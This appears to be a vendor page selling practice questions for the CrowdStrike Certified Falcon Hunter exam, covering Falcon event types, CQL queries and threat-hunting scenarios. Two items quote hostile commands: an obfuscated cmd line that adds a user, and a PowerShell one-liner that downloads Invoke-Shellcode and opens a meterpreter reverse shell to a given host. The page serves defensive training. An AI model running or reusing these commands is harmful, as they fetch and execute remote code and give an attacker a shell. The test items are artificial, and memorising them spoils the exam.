Pre-Summer Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: best70

CCFH-202b CrowdStrike Certified Falcon Hunter Questions and Answers

Questions 4

You are investigating a suspicious file execution on a host and need to understand how the process interacted with the system. Which combination of key data event types should be used in this scenario to understand the process execution and its network activity?

Options:

A.

PeFileWritten and ImageHash

B.

ProcessRollup2 and NetworkConnectIP4

C.

NetworkConnectIP4 and PeFileWritten

D.

ImageHash and ProcessRollup2

Buy Now
Questions 5

While performing a threat hunt in your environment, you decide to identify rare occurrences of user agent strings over the past 30 days. Which query will highlight those results using CQL?

Options:

A.

groupBy(UserAgentString, function=collect([ComputerName, UserName, LocalAddressIP4])) | min(field=UserAgentString, limit=10)

B.

selectFromMin(field=UserAgentString, include=[ComputerName, UserName, LocalAddressIP4])

C.

groupBy(UserAgentString, function=[collect([ComputerName, UserName, LocalAddressIP4]), count()] ) | sort(_count, order=asc, limit=10)

D.

tail(field=UserAgentString, limit=10, include=[ComputerName, UserName, LocalAddressIP4])

Buy Now
Questions 6

You want to find all executions of a file on older Windows operating systems. You also want to include the Windows OU and focus on OUs with highly privileged systems and users. Which query will include the file name, operating system, and OU?

Options:

A.

#event_simpleName=ProcessRollup* FileName=file.exe | match(file="aid_master_main.csv", field=[aid], include=[Version, OU] )

B.

#event_simpleName=ProcessRollup* FileName=file.exe | selfjoin(file="aid_master_main.csv", field=[aid], include=[Version, OU] )

C.

#event_simpleName=ProcessRollup* FileName=file.exe | lookup(file="aid_master_main.csv", field=[aid], include=[Version, OU] )

D.

#event_simpleName=ProcessRollup* FileName=file.exe | join(file="aid_master_main.csv", field=[aid], include=[Version, OU] )

Buy Now
Questions 7

Which statement will filter for all events that correspond to a new scheduled task registered by the user "Doris"?

Options:

A.

#event_simpleName=ProcessRollup2 FileName="*.sht" | UserName="Doris"

B.

#event_simpleName=ScheduledTaskRegistered | UserName="Doris"

C.

#event_simpleName=ProcessRollup2 ProcessName="taskmgr.exe" | UserName="Doris"

D.

#event_simpleName=NewScheduledTaskRegistered | UserName="Doris"

Buy Now
Questions 8

According to the MITRE ATT & CK Framework, if an adversary is trying to Gain Access by Credential Access via OS Credential Dumping, what is the specific attacker's technique that you can also use as a filter on the detections page to find similar activities?

Options:

A.

Gain Access

B.

OS Credential Dumping

C.

Credential Access

D.

Lateral Movement

Buy Now
Questions 9

You suspect that a user is abusing their admin privileges and you want to see the recent commands they have been utilizing. Which Investigate search will identify this?

Options:

A.

Host Search

B.

Process timeline

C.

User Search

D.

Process Context

Buy Now
Questions 10

Which built-in hunting report helps you find executables from the Recycle Bin?

Options:

A.

Indicator Activity

B.

Command Line and ASEP Activity

C.

Executables running from Recycle Bin

D.

Detection Activity

Buy Now
Questions 11

What will the following obfuscated command do?

cmd /c "set x=^n^e^t & set y=@er & set yy=z & set z=r & set r=remove & set f=Domain+ff & set ff=Admin & set g=gumball@ & echo %x%%y:@=us% /%z:r=add% %ff% %g:@=r% | cmd"

Options:

A.

Add a user named “Admin” to the local host

B.

Remove a user named “Admin” from the local host

C.

Change the password for a user named “Admin” to “%g:@=r%”

D.

Add a user named “Admin” to the Domain Admins group

Buy Now
Questions 12

Which is a normal parent of cmd.exe on Windows?

Options:

A.

explorer.exe

B.

userinit.exe

C.

svchost.exe

D.

winlogon.exe

Buy Now
Questions 13

Your organization uses an internally developed application for operations. The application is triggering Indicators of Attack (IOA) detections for vulnerable driver usage on servers where Falcon was just installed. After reviewing the application, you determine that application behavior is expected. What will reduce risk in the environment the most?

Options:

A.

Update the vulnerable driver to a non-vulnerable recent version

B.

Create a Machine Learning Exclusion

C.

Create an IOA exclusion for this activity

D.

Create a Sensor Visibility Exclusion

Buy Now
Questions 14

You want to use result data from an Advanced Event Search to create a custom dashboard that will display the total number of detections in a seven-day time period. Which widget will allow you to display the total number of detections as a single value digit?

Options:

A.

Gauge Widget

B.

Time Chart Widget

C.

Scatter Chart Widget

D.

Heat Map Widget

Buy Now
Questions 15

You receive an alert for the following process tree:

w3wp.exe > powershell.exe > cmd.exe > whoami.exe > net1.exe Which of the following describes what has occurred?

Options:

A.

Reconnaissance commands run via a webserver compromise

B.

Webserver troubleshooting user access issues by querying whoami and net1

C.

Email gateway automating routine tasks for networking configuration

D.

Email gateway validating user permissions with whoami and network status with net1

Buy Now
Questions 16

You are investigating a process tree where WmiPrvSE launched PowerShell with the following command:

powershell.exe Windowstyle Hidden noprofile noexit -c IEX ((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force

What is this command doing?

Options:

A.

Using PowerShell to perform a discovery scan of 172.17.0.21 on port 8080

B.

Utilizing PowerShell to force a connection to a reverse shell originating from GitHub

C.

Utilizing PowerShell to download a reverse shell from GitHub and executing it to create a connection

D.

Using WMI to update the PowerShell execution policy on a remote host

Buy Now
Questions 17

Which Falcon feature creates a graphical view of users, endpoints, and the connections between them by logon type?

Options:

A.

Remote access graph

B.

Geo location activity

C.

Host Timeline

D.

Indicator Graph

Buy Now
Questions 18

What can a hunter add at the end of a search string in Advanced Event Search to identify outliers when quantifying the results?

Options:

A.

| groupBy()

B.

| eval()

C.

| sample()

D.

| stats()

Buy Now
Exam Code: CCFH-202b
Exam Name: CrowdStrike Certified Falcon Hunter
Last Update: Apr 20, 2026
Questions: 60

PDF + Testing Engine

$134.99

Testing Engine

$99.99

PDF (Q&A)

$84.99